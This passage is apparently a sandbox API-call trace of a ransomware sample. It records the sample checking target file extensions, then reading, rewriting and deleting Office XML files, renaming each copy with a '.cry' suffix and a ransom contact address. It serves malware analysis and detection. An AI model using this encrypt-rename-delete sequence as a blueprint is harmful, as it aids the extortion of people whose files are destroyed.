lpString2=".cry") returned 1 [0039.394] lstrlenW (lpString="web.xml") returned 7 [0039.394] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0039.753] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=207) returned 1 [0039.753] CloseHandle (hObject=0x19c) returned 1 [0039.754] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml")) returned 0x20 [0039.754] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.754] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.754] lstrlenW (lpString=".doc") returned 4 [0039.754] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.754] lstrlenW (lpString=".docx") returned 5 [0039.754] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0039.754] lstrlenW (lpString=".pdf") returned 4 [0039.754] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.754] lstrlenW (lpString=".xls") returned 4 [0039.754] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.754] lstrlenW (lpString=".xlsx") returned 5 [0039.754] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0039.754] lstrlenW (lpString=".ppt") returned 4 [0039.754] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.754] lstrlenW (lpString=".zip") returned 4 [0039.755] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.755] lstrlenW (lpString=".rar") returned 4 [0039.755] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.755] lstrlenW (lpString=".bz2") returned 4 [0039.755] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.755] lstrlenW (lpString=".7z") returned 3 [0039.755] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.755] lstrlenW (lpString=".dbf") returned 4 [0039.755] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.755] lstrlenW (lpString=".1cd") returned 4 [0039.755] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.756] lstrlenW (lpString=".jpg") returned 4 [0039.756] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.756] lstrlenW (lpString=".doc") returned 4 [0039.756] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.756] lstrlenW (lpString=".docx") returned 5 [0039.756] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0039.756] lstrlenW (lpString=".pdf") returned 4 [0039.757] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.757] lstrlenW (lpString=".xls") returned 4 [0039.757] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.757] lstrlenW (lpString=".xlsx") returned 5 [0039.757] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0039.757] lstrlenW (lpString=".ppt") returned 4 [0039.757] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.757] lstrlenW (lpString=".zip") returned 4 [0039.757] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.757] lstrlenW (lpString=".rar") returned 4 [0039.757] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.757] lstrlenW (lpString=".bz2") returned 4 [0039.757] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.757] lstrlenW (lpString=".7z") returned 3 [0039.757] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.757] lstrlenW (lpString=".dbf") returned 4 [0039.757] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.757] lstrlenW (lpString=".1cd") returned 4 [0039.757] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 72 [0039.757] lstrlenW (lpString=".jpg") returned 4 [0039.757] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.758] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0039.758] lstrlenW (lpString="AccessMUISet.XML") returned 16 [0039.758] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0039.991] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=819) returned 1 [0039.992] CloseHandle (hObject=0x1bc) returned 1 [0039.992] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 0x20 [0039.992] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.992] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0039.992] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.992] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.992] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0039.992] GetLastError () returned 0x0 [0039.992] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x333, lpOverlapped=0x0) returned 1 [0040.109] WriteFile (in: hFile=0x1c0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x340, lpOverlapped=0x0) returned 1 [0040.110] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.110] WriteFile (in: hFile=0x1c0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0040.110] SetEndOfFile (hFile=0x1c0) returned 1 [0040.110] CloseHandle (hObject=0x1c0) returned 1 [0040.111] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.111] SetEndOfFile (hFile=0x1bc) returned 1 [0040.111] CloseHandle (hObject=0x1bc) returned 1 [0040.112] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.112] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 1 [0040.112] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.112] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.112] lstrlenW (lpString=".doc") returned 4 [0040.112] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.112] lstrlenW (lpString=".docx") returned 5 [0040.112] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0040.112] lstrlenW (lpString=".pdf") returned 4 [0040.112] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.112] lstrlenW (lpString=".xls") returned 4 [0040.112] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.112] lstrlenW (lpString=".xlsx") returned 5 [0040.112] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0040.112] lstrlenW (lpString=".ppt") returned 4 [0040.112] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.112] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.112] lstrlenW (lpString=".zip") returned 4 [0040.112] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.112] lstrlenW (lpString=".rar") returned 4 [0040.112] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.113] lstrlenW (lpString=".bz2") returned 4 [0040.113] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.113] lstrlenW (lpString=".7z") returned 3 [0040.113] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.113] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.121] lstrlenW (lpString=".dbf") returned 4 [0040.121] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.121] lstrlenW (lpString=".1cd") returned 4 [0040.121] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.121] lstrlenW (lpString=".jpg") returned 4 [0040.121] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.121] lstrlenW (lpString=".doc") returned 4 [0040.121] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.121] lstrlenW (lpString=".docx") returned 5 [0040.121] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0040.121] lstrlenW (lpString=".pdf") returned 4 [0040.121] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.121] lstrlenW (lpString=".xls") returned 4 [0040.121] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.121] lstrlenW (lpString=".xlsx") returned 5 [0040.121] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0040.121] lstrlenW (lpString=".ppt") returned 4 [0040.122] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.122] lstrlenW (lpString=".zip") returned 4 [0040.122] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.122] lstrlenW (lpString=".rar") returned 4 [0040.122] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.122] lstrlenW (lpString=".bz2") returned 4 [0040.122] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.122] lstrlenW (lpString=".7z") returned 3 [0040.122] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.122] lstrlenW (lpString=".dbf") returned 4 [0040.122] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.122] lstrlenW (lpString=".1cd") returned 4 [0040.122] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0040.122] lstrlenW (lpString=".jpg") returned 4 [0040.122] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.122] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.122] lstrlenW (lpString="InfoPathMUI.XML") returned 15 [0040.122] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.122] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1231) returned 1 [0040.122] CloseHandle (hObject=0x1bc) returned 1 [0040.122] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 0x20 [0040.123] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.123] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.123] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.123] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.123] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0040.203] GetLastError () returned 0x0 [0040.203] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x4cf, lpOverlapped=0x0) returned 1 [0040.220] WriteFile (in: hFile=0x1c0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x4d0, lpOverlapped=0x0) returned 1 [0040.220] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.220] WriteFile (in: hFile=0x1c0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0040.221] SetEndOfFile (hFile=0x1c0) returned 1 [0040.221] CloseHandle (hObject=0x1c0) returned 1 [0040.221] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.221] SetEndOfFile (hFile=0x1bc) returned 1 [0040.222] CloseHandle (hObject=0x1bc) returned 1 [0040.222] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.222] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 1 [0040.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.223] lstrlenW (lpString=".doc") returned 4 [0040.223] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString=".docx") returned 5 [0040.223] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.223] lstrlenW (lpString=".pdf") returned 4 [0040.223] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString=".xls") returned 4 [0040.223] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString=".xlsx") returned 5 [0040.223] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.223] lstrlenW (lpString=".ppt") returned 4 [0040.223] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.223] lstrlenW (lpString=".zip") returned 4 [0040.223] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.223] lstrlenW (lpString=".rar") returned 4 [0040.223] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString=".bz2") returned 4 [0040.223] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString=".7z") returned 3 [0040.223] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.223] lstrlenW (lpString=".dbf") returned 4 [0040.223] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.223] lstrlenW (lpString=".1cd") returned 4 [0040.223] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.223] lstrlenW (lpString=".jpg") returned 4 [0040.223] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.224] lstrlenW (lpString=".doc") returned 4 [0040.224] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".docx") returned 5 [0040.224] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.224] lstrlenW (lpString=".pdf") returned 4 [0040.224] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".xls") returned 4 [0040.224] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".xlsx") returned 5 [0040.224] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.224] lstrlenW (lpString=".ppt") returned 4 [0040.224] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.224] lstrlenW (lpString=".zip") returned 4 [0040.224] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.224] lstrlenW (lpString=".rar") returned 4 [0040.224] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".bz2") returned 4 [0040.224] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString=".7z") returned 3 [0040.224] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.224] lstrlenW (lpString=".dbf") returned 4 [0040.224] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.224] lstrlenW (lpString=".1cd") returned 4 [0040.224] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.224] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.224] lstrlenW (lpString=".jpg") returned 4 [0040.224] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.224] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.224] lstrlenW (lpString="OfficeMUI.XML") returned 13 [0040.224] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.225] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=5557) returned 1 [0040.225] CloseHandle (hObject=0x1bc) returned 1 [0040.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml")) returned 0x20 [0040.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.226] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.226] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 